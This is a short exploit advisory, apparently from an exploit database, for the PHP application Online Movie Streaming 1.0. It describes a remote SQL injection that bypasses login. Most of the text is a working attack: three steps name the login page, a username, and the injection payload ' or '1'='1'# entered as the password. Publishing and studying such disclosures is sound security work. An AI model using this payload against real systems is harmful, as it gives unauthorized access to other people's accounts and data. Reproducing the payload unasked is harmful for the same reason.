Online Movie Streaming version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
0da9691efbdbf5bd54c0dbebcc348b83
# Exploit Title: Online Movie Streaming 1.0 - Authentication Bypass
# Date: 2020-12-27
# Exploit Author: Kshitiz Raj (manitorpotterk)
# Vendor Homepage: https://www.sourcecodester.com/php/14640/online-movie-streaming-php-full-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14640&title=+Online+Movie+Streaming+in+PHP+with+Full+Source+Code
# Version: 1.0
# Tested on: Windows 10/Kali Linux
Step 1 - Go to url http://localhost/onlinemovie/user-login.php
Step 2 – Enter Username :- [email protected]
Step 3 - Enter Password - ' or '1'='1'#